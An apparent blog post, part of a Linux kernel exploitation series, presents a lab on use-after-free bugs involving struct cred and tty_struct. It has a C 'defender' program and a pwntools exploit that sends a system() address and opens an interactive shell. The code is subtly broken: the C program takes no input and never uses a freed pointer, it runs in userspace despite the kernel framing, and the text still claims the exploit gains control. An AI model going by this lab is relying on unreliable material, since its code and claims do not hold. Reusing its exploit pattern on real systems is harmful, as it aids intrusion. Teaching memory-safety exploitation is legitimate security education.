strangerRidingCaml
9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct) 본문
9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)
woddlwoddl 2024. 5. 12. 03:04Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)
Use-After-Free (UAF) vulnerabilities occur when a program continues to use a pointer after the memory it points to has been freed, potentially leading to memory corruption or code execution.
Lab Activity: Use-After-Free (UAF) Exploit
In this lab activity, we'll demonstrate a UAF exploit on a vulnerable C program, featuring struct cred and tty_struct.
Defender Side Code:
The defender side code simulates a vulnerable program that uses a struct cred and tty_struct, leading to a UAF vulnerability.
#include <stdio.h>
#include <stdlib.h>
// Define struct cred and tty_struct
struct cred {
int uid;
int gid;
// Other fields
};
struct tty_struct {
// Fields
};
void vulnerable_function(struct cred *ptr_cred, struct tty_struct *ptr_tty) {
free(ptr_cred); // Free the struct cred object
// Do some other operations
// Use ptr_tty after free
}
int main() {
// Allocate memory for struct cred and tty_struct
struct cred *ptr_cred = (struct cred *)malloc(sizeof(struct cred));
struct tty_struct *ptr_tty = (struct tty_struct *)malloc(sizeof(struct tty_struct));
vulnerable_function(ptr_cred, ptr_tty); // Call vulnerable function
return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7 # Example address, adjust as necessary
# Address of system function or other desired function
system_addr = 0x00400500 # Example address, adjust as necessary
# Establish connection to the vulnerable program
p = process("./vulnerable_program")
# Send input to trigger UAF vulnerability and overwrite struct cred with system function address
payload = b"A" * 8 + p64(system_addr)
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code constructs a payload to trigger the UAF vulnerability by overwriting the freed struct cred object with the address of the system function or any other desired function. It then establishes a connection to the vulnerable program, sends the payload, and gains control over program execution upon successful exploitation.
'Linux kernel exploit' 카테고리의 다른 글
11. Kernel Address Space Layout Randomization (KASLR) (0) | 2024.05.13 |
---|---|
10. Return-to-Direct-Mapped Memory (ret2dir) Attacks (0) | 2024.05.12 |
8. Null Pointer Dereference Exploits (0) | 2024.05.12 |
7. Write-What-Where (Arbitrary Memory Overwrite) (0) | 2024.05.12 |
6. Return-Oriented Programming (ROP) (0) | 2024.05.12 |